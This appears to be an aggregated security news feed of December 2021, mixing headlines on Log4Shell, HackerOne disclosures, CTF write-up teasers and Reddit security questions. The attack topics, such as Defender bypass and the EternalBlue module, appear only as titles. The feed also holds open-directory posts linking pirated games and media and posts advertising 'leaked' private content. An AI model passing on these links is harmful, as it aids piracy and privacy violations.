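    Although these online "attendance clock-in tools" can relieve some workers of the hassle of clocking in, this is falsified attendance and a form of workplace dishonesty.
    Experts detail macOS vulnerability that lets malware bypass Gatekeeper
    The root cause lies in script-based, unsigned, un-notarized applications that fail to explicitly specify an interpreter, which leads to a clean bypass.  ( 1 min )
    Usage up 46%: privacy-focused search engine DuckDuckGo is growing fast
    The privacy-focused search engine DuckDuckGo continued to grow rapidly in 2021 and now averages more than 100 million search queries per day.  ( 1 min )
    From network security to cloud services, Topsec uses security to support the development of the cloud computing industry
    Topsec develops its own cloud products with a convergence mindset, using security to support the development of the cloud computing industry.
    Do you really know how to use a search engine? Learn these advanced operators to get twice the result with half the effort
    This article introduces several commonly used advanced search engine operators; mastering them will make your information retrieval far more efficient.  ( 1 min )
    Gartner highlights five impactful technologies from its 2022 Emerging Technologies and Trends Impact Radar
    This year's Emerging Technologies and Trends Impact Radar contains 23 emerging trends and technologies most likely to disrupt and transform markets.
    From zero to one: a deep dive into the log4j2 JNDI RCE vulnerability CVE-2021-44228
    By introducing the Java logging ecosystem and analyzing the log4j2 source code, this article takes you deep into the internet's latest "nuclear bomb" vulnerability.  ( 2 min )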
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    Untitled
    VK.com disclosed a bug submitted by azimoff: https://hackerone.com/reports/1300583 - Bounty: $300
    Bot setting information leakage in OpenChat room
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1305432 - Bounty: $200
    Access to images and videos in drafts on LINE BLOG
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1290170 - Bounty: $780
    Missing authentication in buddy group API of LINE TIMELINE
    LINE disclosed a bug submitted by e26174222: https://hackerone.com/reports/1283938 - Bounty: $3000
    See drafts and post articles if the account owner hasn't set password (livedoor CMS plugin)
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1278881 - Bounty: $1300
    Missing ownership check in 2FA for secondary client login
    LINE disclosed a bug submitted by shi0n: https://hackerone.com/reports/1250474 - Bounty: $7500
    Developer uploaded files missing authentication on LINE GAME Developers site(gdc.game.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/969605 - Bounty: $1000
    Password reset by malicious input on air.line.me
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/968742 - Bounty: $500
    LINE Profile ID leaks in OpenChat
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/927338 - Bounty: $3000

  • Open

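    ZAP's new Import/Export add-on, and some speculation about the future
    Recently, several Import- and Save-related features in ZAP were consolidated into a new add-on named "Import/Export". Nothing changes in the user interface, so not much is different, but it offers a glimpse of where ZAP's Import/Export functionality is heading, so I'm writing it up 😎 Import files containing URLs, Log File Importer, Save Raw Message, Save XML Message. The actual add-on name of the newly added Import/Export is exim. EXIM is short for EXport & IMport and is widely used on the web with the same meaning. ZAP add-ons are more or less required to provide an API, so exim is exposed through the API as well.
    Let's scan for Web Cache vulnerabilities 🔭
    Web Cache vulnerabilities such as Web Cache Poisoning and Web Cache Deception are fairly old techniques, but they seem to have advanced quickly over the past few years thanks to Portswigger researchers such as albinowax (@albinowax). These vulnerabilities are identified and exploited through various testing methods, but until now there was no tool I considered particularly powerful. (The closest would be burpsuite's built-in scanner…) Today I'd like to share a good tool that can quickly identify Web Cache vulnerabilities! In fact, I had been building a similar tool very slowly since around this summer (June '21 or so?), but Hackmanit beat me to it.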
  • Open

    Various stuff - mostly photos
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    Music
    submitted by /u/International_Milk_1 [link] [comments]
    A nice list of movies, and older tv series such as Mannix
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    1.19TB of documentaries, many with subtitles (repost from January 2019)
    submitted by /u/Throw10111021 [link] [comments]  ( 1 min )
    "Poetry for the Beat Generation" plus some jazz albums (flac)
    Finally found "Poetry for the Beat Generation" with Allen on piano and Kerouac reciting http://109.120.203.163/Music/Acid%20jazz/ submitted by /u/SexRevolutionnow [link] [comments]
    Music which was pasted before, but at different link
    submitted by /u/International_Milk_1 [link] [comments]
    Movies and tv shows. But it's a mixture of those which are dubbed in persian/iranian with no english audio option, and those with english language soundtrack and persian/iranian subs. But subs can be turned off. Speed is so so I guess.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    XPSF VLC Playlist of movies I found here
    Please delete if not allowed Hi guys, awhile ago I made a quick and easy browser tool to convert links into a VLC Playlist, you might be wondering why I opted out of M3U playlists, honestly for future expansion, m3u playlists tend to be pretty simple on the SPEC, can't define much, while XPSF allows for things like duration setting. It is a goal to rewrite this eventually and figure out a way of showing the duration, probably using an API of some kind. (my tool: https://csmit195.github.io/Links-to-XSPF-Web-App/) I have two files, one is 14.1k movies, and the other is 4.1k movies. My PC is fairly fast and loading the 14.1k movies took about 3mins, while the 4.1k only takes 10secs. Please test carefully with the 14.1k, some PC's might fail to load it, vlc could crash b4 finish loading. Downloads: note: the top 1.1k movies of both files are more popular than the ones below it 14.1K Movies (4.1K Movies from below included) https://drive.google.com/file/d/1gSjguuPTTyP_2oVktKD_YqbaAZStpEu4/view?usp=sharing 4.1K Movies https://drive.google.com/file/d/1dSb3d_CDbsvR7UO8nnnDBdYmJmsuBPv2/view?usp=sharing If you want more or have a really good source of direct movie links, feel free to lmk and I'll create more playlists. For now, enjoy and would love feedback (please no code reviews, I made it quickly so I can achieve this goal, wasn't really built for production, I'd love to optimise it in the future tho. Cheers, Chris submitted by /u/csmit195 [link] [comments]  ( 2 min )
  • Open

    A capability-safe language would have minimized the Log4j vulnerability
    Article URL: https://justinpombrio.net/2021/12/26/preventing-log4j-with-capabilities.html Comments URL: https://news.ycombinator.com/item?id=29696318 Points: 94 # Comments: 142  ( 6 min )
  • Open

    Abeats Bounty Program
    Aiming to test the website's usability, the bounty program is ideal for gathering engagement from the community and finding the necessary… Continue reading on Medium »  ( 1 min )
    CVE-2021-40579
    Insecure direct object references (IDOR) Continue reading on Medium »  ( 1 min )
    Passive Information Gathering for Pentesting
    Information gathering very important for pentester. Continue reading on Medium »  ( 2 min )
  • Open

    How do I start with Netsec ?
    I am currently enrolled in a computer science degree and, asked myself what I want to do with it. I often found myself at one field, Security. However I have no clue on how or where to start learning more about the field. For example I find pentesting especially interesting and searched for ways to get into the field. I found two ideologies for that, one being hands on experience and the other being strong basics. However that only gave me more questions. First: what is "Hands-on experience" ? Do I have to hack my own laptop or crack my neighbor's Wifi password? Or is it much simpler to get experience? Second: Basics of what? How a computer works? The different protocols of the internet? And also, how do I get strong basics ? Where do I even start? submitted by /u/CallMeNepNep [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-26 Review
    gosint open-sourced by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Cracked5pider/KaynLdr: KaynLdr is a Reflective Loader written in C/ASM
    submitted by /u/dmchell [link] [comments]
  • Open

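    FreeBuf Morning Briefing | Some apps can still obtain user information with all permissions denied; pirated Spider-Man copies contain malware
    Some pirated copies of "Spider-Man: No Way Home" contain trojans or bundled malware, and some even include cryptocurrency miners.  ( 1 min )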
  • Open

    Advent of Cyber 3 Day 16 - Ransomware Madness Walkthrough
    You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang.  As… Continue reading on Medium »  ( 2 min )
    Log4Shell — You should know about it.
    Hello everyone! Continue reading on Medium »
  • Open

    What is a Watering Hole Attacks and How to Prevent Them
    submitted by /u/bee925p [link] [comments]  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    Weaponize JScript to bypass Windows Defender
    To gain initial access during a Red Team Engagement, Phishing might be a valid option. Continue reading on Medium »  ( 3 min )
  • Open

    Accessing data in suspect disk
    After copying with write block how do investigators access data in an encrypted drive? Do they have to break the encryption password with powerful servers? Or are there other methods? submitted by /u/thecirclingfly [link] [comments]  ( 2 min )

  • Open

    Join Synack Red Team
    Hi, how to join synack after finishing HTB track submitted by /u/0xA1MN [link] [comments]
    Stay organized with your pentesting knowledge
    Hi, I am not a professional, I just love pentesting/CTF stuff and I discover new things every day, thanks to HackTheBox, TryHackMe and other platforms. I would like to collect all my knowledge online, let's say a webpage with methodology step-by-step: information gathering, scanning, search for vulnerabilities and so on.. I would like to put "cheatsheet" for useful commands like nmap, dirbuster, sqlmap .. I tried a simple blog with Wordpress, but I am wondering if you use something better (github)? Thank you. submitted by /u/g-simon [link] [comments]  ( 2 min )
    Firewall+IPS hardware recommendations for a home LAN setup
    Hi All, i'm planning to play around with some firewall distros that have IPS/Suricata enabled. Target environment is for a SOHO with around 10 people, not hosting any web servers or whatnot. Any hardware recommendations, particularly on the CPU and RAM? Is a Pentium Gold G6400(2 cores, 4 threads) and 4GB RAM good enough? i read somewhere that CPU(# of cores) carries more weight than RAM, IPS-wise. Would it make sense to use AMD processors instead? Wouldn't the GPU cores just go to waste on a firewall/IPS? tia submitted by /u/albertcuy [link] [comments]  ( 1 min )
    How secure is it to stay logged into a site?
    Say you stay logged into an email or social media site, is there any risk in doing so? submitted by /u/RaZdoT [link] [comments]  ( 1 min )
    How secure is Netgear RAX45 VPN with Remote Desktop?
    I turned on VPN in router settings, which uses OpenVPN, and successfully set up a Remote Desktop, using OpenVPN Client and Remote Desktop for windows 10. Wanted to ask: - how secure is this setup? - is there a better way to have a cheap and personal/small business secure Remote Desktop with VPN? submitted by /u/WiseMan9000 [link] [comments]  ( 1 min )
  • Open

    Smallish list of older movies. Nothing after 1972. Some good stuff here.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Animation with audio options for English or Farsi, according to the few I checked (slow, though)
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

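    From Getting to Know DongTai IAST to Joining the Open Source Community
    As a member of my company's information security department, ensuring application security for every line of business is part of my job. So how do I accomplish this mission?  ( 1 min )
    Writing an Xposed Module from 0 to 1: Anti Screenshot
    A newbie's road to screenshots  ( 1 min )
    Abaddon: An Enhancement Tool Designed for Red Team Researchers
    Abaddon aims to help red team researchers improve operational efficiency and perform certain repetitive operations faster and more stealthily.  ( 1 min )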
  • Open

    HOW I Found 17 Critical and Medium Security Bug on INDUSIND Bank
    Hi, everyone Continue reading on Medium »  ( 3 min )
    How I got access Maxlifeinsurance insurance company AWS metadata access by SSRF
    Hi, everyone Continue reading on Medium »  ( 3 min )
    Jerry From Hackthebox
    Hello everyone I am HAC and Today we will be doing jerry from Hackthebox Continue reading on Medium »  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾, Continue reading on Medium »  ( 2 min )
    SQL Injection — 1st Dose
    An Injection that is not used for treatment! Continue reading on Medium »  ( 2 min )
    Information Disclosure leads to sensitive credential($$$)
    Hi Hackers, hope you are fine. My name is khan mamun (white hat hacker). This is my 3rd write up. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-25 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    I found (and fixed) a vulnerability in Python
    Article URL: https://tldr.engineering/how-i-found-and-fixed-a-vulnerability-in-python/ Comments URL: https://news.ycombinator.com/item?id=29683853 Points: 3 # Comments: 0  ( 2 min )
  • Open

    Router Management Practices: Web, App, and forcing to associate user home network with a vendor account
    submitted by /u/wkwrd [link] [comments]
    Make Your Pc Notify Your Phone Whenever There is Movement Around it
    submitted by /u/MagicianPutrid5245 [link] [comments]  ( 1 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CaseVegas Walkthrough — Cyberdefenders
    Challenge: CaseVegas Continue reading on Medium »  ( 7 min )
  • Open

    Forensic Courses
    Took the video lectures from EC Council CHFI. But it did not teach me how to use tools or real world data just the theory. Can you suggest a course/resource/links that teach you how to use forensic tools with real world scenarios. submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    A bit of amateur detective work
    Hi all, I am looking at some student submissions of word 2010 docs. I suspect the time stamp has been changed in some way. Is there a way to verify it beyond just looking at the word doc's property? submitted by /u/HelloAmes [link] [comments]  ( 2 min )
  • Open

    Dalfox 2.7 Released 🎉
    Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features this release. But it’s better than before, so I recommend an update! Then let’s start the review. and Have a great holiday 🧑🏼‍🎄 Thank you ❤️ First, Thank you so much all contributors !! Thanks to our, this project is getting better and better. Thank you always! Release note Github | DockerHub Add BAV Module ESI Injection Support to windows/arm64 Upgrade go dependency (1.

  • Open

    I set up MAC address filtering but there are still unrecognized devices on my network. Is this normal?
    I recently set up MAC address filtering (white-list/allow-list) to only allow certain devices to connect to my network. However, when I check connected devices, I still see two devices that I don't recognize and they are not in my allow-list. How are they connecting to the network? I tested the MAC address filtering with my phone temporarily removing it from the list, and the filter worked. So I am confused why those two devices are not blocked. For what it's worth, both devices are showing as "Espressif Inc" and are probably part of my smart devices, so I am not too concerned about them. However, I would still like to understand why they are not being blocked by the filter. submitted by /u/ultrakawaii [link] [comments]  ( 1 min )
    identifies SSL/TLS dependencies
    Hello, it may look like a noob question, but it's my first job and... We have servers on which weak SSL/TLS versions are running. So I have spoken with the server owners and checked on which ports their usage has been detected. At the end of the investigation, I had determined that it was OK if I disabled TLS 1.0 and 1.1. But this was a mistake, and one of our important applications couldn't communicate anymore with our SQL server. In the panic I reversed all of my changes. And now I'm afraid of trying to patch these issues. So what is the best way to detect the usage of SSL/TLS? Should I sniff every server with Wireshark, or something else? Thank you all submitted by /u/Low_Lettuce_8933 [link] [comments]  ( 2 min )
    How to view the exploit code of metasploit's auxiliary or exploits?
    I've been trying to get shell into a exploit of SMB but I think it uses somewhat of buffer overflows scheme. Any way to see the exploit [code] behind metasploit exploits? Here's the exploit I've been trying to use: exploit/windows/smb/ms17_010_eternalblue submitted by /u/The_Intellectualist [link] [comments]  ( 1 min )
  • Open

    Threat in Lunar Client?? java.trojan.genericgba.30921
    Hello, I recently did an analysis with Bitdefender and I detected this threat: java.trojan.genericgba.30921, but I looked for this name on the internet and nothing came up. The strange thing is that the threat was detected in a Lunar Client folder (a Minecraft client) and also in a Minecraft mod (Geyser). This seems very strange to me because, according to Lunar Client and the Geyser mod, it is safe. Does someone here have an answer as to why it is detected as a threat? submitted by /u/QuirkyCod4995 [link] [comments]  ( 1 min )
    About work fields (investigation, private market etc).
    I'm 18 and I'm from Brazil. I'm currently studying Computer Science. Some things led me to become interested in computer forensics these past months, and I'm interested in following this career. Since here in Brazil you first need a CS degree to do a computer forensics course, I'm focused on finishing my CS course first for now. I looked at the FAQ here and got a lot of useful information, but I still have one that wasn't answered: what are the fields you can work in? I know you can work in law enforcement and do forensics analysis to find digital evidence of a suspect (which is most cases, I believe), but can you work in the investigation field (like tracing criminals online)? If not, how do I work in this investigation field related to crimes online? Is computer forensics the best thing to study in this case? Another question is: in the private work field, how does it work? Do you work with data recovery stuff? I hope I don't annoy you with those questions, but I couldn't find them here yet! submitted by /u/silva-txt [link] [comments]  ( 1 min )
    Timeline
    hi, is there a way in excel or other software to put a list of phonecalls, their dates and time and get a timeline that show how many calls were made to the same phone or to the same phone by date and time. Thanks in advance. submitted by /u/joshmaidom [link] [comments]  ( 1 min )
    ?? After seizing an Android 10, should keep charging battery ??
    There may be weeks before digital forensic people come to examine the Android 10 phone with unknown passcode. It was in use when seized, but later auto locked. Pls help: (1) Should keep it powered on and keep charging it? Since the battery cannot last long enough for weeks. (2) Would it be harder to unlock or retrieve data if we let it power down and then switch it on later? submitted by /u/Just_Drama5668 [link] [comments]  ( 2 min )
  • Open

    Joni Mitchell albums
    submitted by /u/International_Milk_1 [link] [comments]
    Clifford D Simak reading City
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Hmm. Some music, but other types of audio (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Tons of pirated video games
    Hi i use this website for repacks ddl http://s5.gamingmaster.ir it has a home page too http://gamingmaster.ir ​ archives password: gamingmaster.ir submitted by /u/develhoper [link] [comments]  ( 1 min )
    movies, korean tv dramas, tv series, etc etc (some txts in english, some in korean-same with content-no english subs for korean dramas)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies, tv shows, music, manga, etc etc (slow speeds)
    submitted by /u/International_Milk_1 [link] [comments]
    music for ringtones
    submitted by /u/International_Milk_1 [link] [comments]
    one very small music list (at least in open directory format-see below) , and 1 very small movie list, with slow speeds.
    The movie one Index of / The Music one Index of /Directos/ (ladiscoteca.net) If you go to parent directory, there is a lot more stuff divided into years, genres etc etc. There is a radio player if you scroll down. Maybe someone else can do a better job of explaining it than me. Although it is not in open directory format. So if you just want to stream, it's good. I think the sound is great though. The one hit wonders is a nice one. submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Anything you want here is for free
    Download limit exceeded for Main drive now 😔 limit resets at 2021-12-25 at 00:00:00 UTC. https://premiuim.rahuljayant.workers.dev/0:/ Edit - You can search from the hamburger menu - For username and password for 18+ from Drop down menu DM , otherwise post will be labelled as NSFW. submitted by /u/rahuljayant1 [link] [comments]  ( 2 min )
    Documentation for classic computers
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    documentary type shows
    https://archive.org/download/pbsnovadocs https://davfl70.org/~davflsev/movies/WWI/ https://ir2.papionvod.ir/Media/Series/Terra%20Nova/Season%201/ http://flixhub.net/Data/Disk3/English%20Tv%20Serise/Planet%20Earth/Season%2001/ https://archive.org/download/Cops-Seasons-1-33-Cops-Reloaded https://archive.org/download/DocuCollection_201702 https://archive.org/download/InsideTheAmericanMobS01E06EndGame 2nd and 3rd links have a ton in their parent directories and 4th is from the most recent post here, sorry for that repost but i figured it id save someone the time of scrounging thru submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    science fiction and fantasy folk music (small selection)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    How to exploit Log4j vulnerabilities in VMWare…
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    Hunting down spider-man using Sherlock
    Ever wondered how to get the social media links of your favorite marvel superheroes or as a matter anyone’s else online social presence? Continue reading on Medium »  ( 1 min )
    Your Stalker Wants Your Outlet
    As crazy as it may sound, your stalker is looking for any possible clue in your photos to get a general idea of where you’re located and… Continue reading on Medium »  ( 1 min )
  • Open

    Micropatching “Ms-Officecmd” Remote Code Execution (No CVE)
    Article URL: https://blog.0patch.com/2021/12/micropatching-ms-officecmd-remote-code.html Comments URL: https://news.ycombinator.com/item?id=29674988 Points: 3 # Comments: 0  ( 5 min )
    Where's the Interpreter? (CVE-2021-30853)
    Article URL: https://objective-see.com/blog/blog_0x6A.html Comments URL: https://news.ycombinator.com/item?id=29669026 Points: 3 # Comments: 0  ( 28 min )
  • Open

    Free public Docker image vulnerability DB
    Article URL: https://dso.atomist.com/explore Comments URL: https://news.ycombinator.com/item?id=29674898 Points: 2 # Comments: 0
    ShortList: Log4j Vulnerability Tools
    Article URL: https://haydenjames.io/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29673107 Points: 1 # Comments: 0  ( 4 min )
    Alberta MLA resigns after RCMP searches home after vulnerability report
    Article URL: https://www.cbc.ca/news/canada/edmonton/alberta-mla-thomas-dang-resigns-from-ndp-caucus-after-rcmp-searches-home-1.6294219 Comments URL: https://news.ycombinator.com/item?id=29670252 Points: 9 # Comments: 0  ( 2 min )
  • Open

    SecWiki News 2021-12-24 Review
    Using CodeQL to Analyze and Hunt for the Log4j Vulnerability by ourren; vulntarget Vulnerable Lab Series (2): vulntarget-b by ourren. For more of the latest articles, visit SecWiki
  • Open

    Full Path Disclosure in Wordpress Rest API Response
    Showmax disclosed a bug submitted by fariqfgi: https://hackerone.com/reports/1358888 - Bounty: $50
    Xss At Shopify Email App
    Shopify disclosed a bug submitted by shaktiranjan867: https://hackerone.com/reports/1339356 - Bounty: $500
    Reflected XSS on dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1212235
    Reflected XSS at dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1210921
  • Open

    Vibranium Debug Campaign
    Vibranium is pleased to announce the debug bounty campaign! Continue reading on Medium »  ( 2 min )
    Getting access to the Database of a Crypto Exchange using Google Dorks!
    Hello, Continue reading on Medium »  ( 2 min )
    Crema Bug Bounty Program Winners Announcement
    Continue reading on Medium »  ( 1 min )
    Install Nuclei on Kali Linux [Latest using go1.17]
    Nuclei : Vulnerability Scanner. Continue reading on Medium »  ( 1 min )
    Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of…
    Hi, everyone Continue reading on Medium »  ( 5 min )
  • Open

    Cloud Security Breaches and Vulnerabilities: 2021 in Review
    submitted by /u/thorn42 [link] [comments]
    Blister malware can breach your devices in absolute stealth
    submitted by /u/IT_band [link] [comments]  ( 1 min )
    Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell
    submitted by /u/aalex954 [link] [comments]
  • Open

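    Five Cybersecurity Predictions for 2022 and Beyond
    Cybersecurity industry leaders currently face numerous challenges, and these will keep increasing over the next few years.  ( 1 min )
    CVE-2021-31956 Vulnerability Analysis
    Overall it is not very difficult, and it is well suited to beginners getting started.  ( 1 min )
    FreeBuf In-House Security Group Discussion | How Should the Value of Enterprise Security Actually Be Measured?
    As one analogy goes, security is the guardrails on both sides of a bridge: when nothing goes wrong nobody notices its value, yet without it people feel uneasy.
    IoT SAFE: Strengthening the Security of the IoT Ecosystem
    There is light at the end of the tunnel.  ( 1 min )
    See You Next Year | The CIS 2021 Spring Edition Topic Preview Livestream Was a Complete Success
    This Christmas, I don't want you to be alone, because FreeBuf Open Class is here to keep you company. From December 21 to December 23 at 19:00 each evening, FreeBuf Open Class invited guests from the conference's forums to preview their topics in livestreams, joining 13 technical experts to discuss new cybersecurity technologies and trends with the audience. Without leaving home, get an early grasp of the key content of each sub-forum and interact closely with industry leaders, so this Christmas you are no longer alone. Over these 3 days of livestreams, guests from all walks of life brought the representatives and standouts among the broadest base of front-line cybersecurity workers a wealth of  ( 1 min )
    Methods for Intercepting Windows ALPC in the Kernel
    ALPC is only a standard protocol; the specific content for each service, such as creating services, creating accounts, or querying system information, is different and has to be decoded manually.  ( 2 min )
    What Is a CDN? How Does a CDN Work?
    A CDN is a content delivery network built on top of the network, relying on edge servers deployed in various locations.
    Building a Proactive Vulnerability Management System for Critical Infrastructure Based on Vulnerability Prioritization | World Information Security Conference
    A brief discussion of building a proactive vulnerability defense system for critical infrastructure.  ( 1 min )
    "Guidelines for Reporting and Sharing Data Security Risk Information in the Industry and Information Technology Sector (Trial) (Draft for Comment)" Released
    The Guidelines state that risk information reporting refers to relevant organizations reporting data security risk information to the Ministry of Industry and Information Technology, local industry and information technology authorities, and local communications administrations.
    What Information Should We Collect in Web Penetration Testing?
    Know yourself and know your enemy, and you will never be defeated. One article on how to maximize information gathering in the early stage of a penetration test.  ( 1 min )
    Because of Rampant Fraud, "Russia's WeChat" VK Makes Two-Factor Authentication Mandatory
    VK is finally starting to introduce two-factor authentication and plans to make it mandatory for administrators of large communities in February 2022.  ( 1 min )
    Research Shows Credential Stuffing Attacks Will Surge over Christmas
    Research analysis says credential stuffing incidents rose 56% during last year's Christmas and New Year shopping period, and up to 8 million attacks per day targeting consumers are expected in the same period of 2021.  ( 1 min )
    Reverse Engineering Tutorial (2): Base Camp
    Reverse Engineering Tutorial (1): Debugging Code. New debugging commands: I expect everyone has mastered the basic commands mentioned in the previous article through hands-on practice. Let's review them: F7, F8, ctrl+F2, ctrl+F9. If they feel unfamiliar, I suggest going back and relearning them. Because today we are going to start learning about  ( 1 min )
    FreeBuf Weekly | Classifieds Site Gumtree Leaks Customer Information; Hive Ransomware Launches Widespread Cyberattacks
    We summarize and recommend this week's hot news, quality articles, and handy tools so that you don't miss any of this week's highlights!  ( 1 min )
    Building a Large-Scale Traffic Data Computation and Analysis Platform and Industry Practice | A First Look at CIS 2021 Spring Edition Conference Topics
    Building a large traffic-based data analysis platform can give enterprises more dynamic and precise marketing recommendations while safeguarding data from a security standpoint.  ( 1 min )
    NVIDIA Discloses Applications Affected by the Log4j Vulnerability
    The Log4Shell vulnerability is being heavily exploited in attacks worldwide.  ( 1 min )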
  • Open

    [project]Bypass Firewalls using Various Evasion Techniques
    Bypass windows firewall using Nmap evasion techniques Continue reading on Medium »  ( 2 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )

  • Open

    Tg pinay
    submitted by /u/kotsu0401 [link] [comments]
    TG pinay leaked
    submitted by /u/kotsu0401 [link] [comments]
    APK for music, movies etc etc
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /library/
    Lots of pdf:es in all kind of subjects. http://erewhon.superkuh.com/library/ submitted by /u/CourseCalm [link] [comments]
    Several albums of deep-sea robot dives from Columbia University's climate school
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Writing/Poetry Anthology Drafts
    submitted by /u/VeinyNotebook [link] [comments]
  • Open

    My smart TV has some sketchy ports open. Any clues?
    I captured some persistent host discovery traffic on my home WiFi network with Wireshark. There's a never-ending activity in UDP and SSDP coming from this device. A basic nmap scan shows the following:

        Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-23 18:37 -03
        Initiating ARP Ping Scan at 18:37
        Scanning 192.168.1.11 [1 port]
        Completed ARP Ping Scan at 18:37, 0.13s elapsed (1 total hosts)
        Initiating Parallel DNS resolution of 1 host. at 18:37
        Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed
        Initiating SYN Stealth Scan at 18:37
        Scanning 192.168.1.11 [1000 ports]
        Discovered open port 8080/tcp on 192.168.1.11
        Discovered open port 9001/tcp on 192.168.1.11
        Discovered open port 9080/tcp on 192.168.1.11
        Discovered open port 8002/tcp on 192.168.1.11
        Discovered open port 8001/tcp on 192.168.1.11
        Discovered open port 9000/tcp on 192.168.1.11
        Completed SYN Stealth Scan at 18:37, 0.23s elapsed (1000 total ports)
        Nmap scan report for 192.168.1.11
        Host is up, received arp-response (0.0058s latency).
        Scanned at 2021-12-23 18:37:29 -03 for 0s
        Not shown: 994 closed ports
        Reason: 994 resets
        PORT     STATE SERVICE        REASON
        8001/tcp open  vcom-tunnel    syn-ack ttl 64
        8002/tcp open  teradataordbms syn-ack ttl 64
        8080/tcp open  http-proxy     syn-ack ttl 64
        9000/tcp open  cslistener     syn-ack ttl 64
        9001/tcp open  tor-orport     syn-ack ttl 64
        9080/tcp open  glrpc          syn-ack ttl 64
        MAC Address: 8C:EA:48:XX:XX:XX (Unknown)
        Read data files from: /usr/bin/../share/nmap
        Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
        Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.052KB)

    It's just a Samsung smart TV. I'm really curious (maybe even concerned!?) about the service on port 9001. What could be going on? submitted by /u/EONRaider [link] [comments]  ( 3 min )
    gSuite login: Okta and VPN, or context aware access, which one is better?
    Hi there, I'm setting up gSuite and need some advice here. Use case requirements: operations team members will have access to customer data on Google Drive, so we want to enforce those team members to only view such data via corporate VPN. Our sales team members do not have access to customer data, so we do not want them to login via VPN because that's extra friction. After researching online, I found two ways of doing this:
    a. Using the context aware access feature from gSuite https://support.google.com/a/answer/9275380?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en
       Pro: set up seems straightforward, and can configure based on teams
       Con: pay more per user, it's like $8 more per user to our current edition
    b. Set up gSuite to login with Okta via SAML, and then configure Okta log on policies to require VPN for certain users https://support.google.com/a/answer/6369487?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en#zippy=%2Csso-usernetwork-mapping-matrix
       Pro: Saves money, get more familiar with SAML which seems useful?
       Questions for experts here about this approach: Is it easy to quickly provision which users are required to login via Okta and VPN? Anything we should be careful about? The process seems quite complicated. How much time will it take? Technically how is this different from option a? I guess gSuite does all the configuration automatically for you to save the time?
    Which one would you advise us to go for? Any thoughts are tremendously appreciated! submitted by /u/johnestar [link] [comments]  ( 2 min )
    Is it possible to put SSO like Okta behind VPN?
    Hi there, I'm wondering is it possible to put Okta behind VPN. If employees are not connected to company VPN, login via Okta should fail. How should I enable this? submitted by /u/johnestar [link] [comments]  ( 1 min )
    Threat Research
    I’m looking into getting into a threat research position and have a few questions: 1) average workload/what to expect 2) what certs/projects would help me get into a position like this 3) any advice from anyone in this type of role I currently do analyst/threat hunting work so I have some experience but hate my current job due to soc grind and burnout. I enjoy active defense topics like honeypots and I think a research role is better suited. MA and phishing analysis is always a fun time for me submitted by /u/blue_Kazoo82 [link] [comments]  ( 1 min )
    Home Networking
